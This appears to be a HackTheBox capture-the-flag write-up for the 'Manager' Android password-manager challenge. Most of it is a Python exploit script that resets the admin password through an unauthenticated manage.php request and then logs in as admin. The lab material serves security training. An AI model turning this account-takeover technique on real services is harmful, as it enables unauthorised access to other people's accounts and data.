HackTheBox Manager Challenge

https://app.hackthebox.com/challenges/283

Description

A client asked me to perform security assessment on this password management application. Can you help me?

Exploitation

Use jadx-gui to decompile and look at the code.

import requests
from urllib.parse import urljoin
import sys

class ManagerApp:
    def __init__(self, base_url):
        self.base_url = base_url
        self.session = requests.Session()

    def login(self, username, password):
        url = urljoin(self.base_url, "login.php")
        data = {
            "username": username,
            "password": password
        }
        try:
            response = self.session.post(url, data=data)
            response.raise_for_status()
            print(f"Login response: {response.text}")
            return response.text
        except requests.exceptions.RequestException as e:
            print(f"Failed to log in: {e}")
            return None

    def register(self, username, password):
        url = urljoin(self.base_url, "register.php")
        data = {
            "username": username,
            "password": password
        }
        try:
            response = self.session.post(url, data=data)
            response.raise_for_status()
            print(f"Register response: {response.text}")
            return response.json()
        except requests.exceptions.RequestException as e:
            print(f"Failed to register: {e}")
            return None

    def update_password(self, username, new_password):
        url = urljoin(self.base_url, "manage.php")
        data = {
            "username": username,
            "password": new_password
        }
        try:
            response = self.session.post(url, data=data)
            response.raise_for_status()
            print(f"Password update response: {response.text}")
            return response.text
        except requests.exceptions.RequestException as e:
            print(f"Failed to update password: {e}")
            return None

    def get_user_info(self, user_id):
        url = urljoin(self.base_url, "manage.php")
        params = {
            "id": user_id
        }
        try:
            response = self.session.get(url, params=params)
            response.raise_for_status()
            print(f"User Info: {response.text}")
            return response.json()
        except requests.exceptions.RequestException as e:
            print(f"Failed to fetch user info: {e}")
            return None

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <ip:port>")
        sys.exit(1)
    base_url = f"http://{sys.argv[1]}/"
    manager = ManagerApp(base_url)
    manager.update_password("admin", "admin")
    login_response = manager.login("admin", "admin")
    if login_response:
        user_info = login_response
        print(f"User registered successfully: {user_info}")
    else:
        print("Registration failed.")

Summary

Manager: inspect the Android app, trace the validation path, and recover the flag.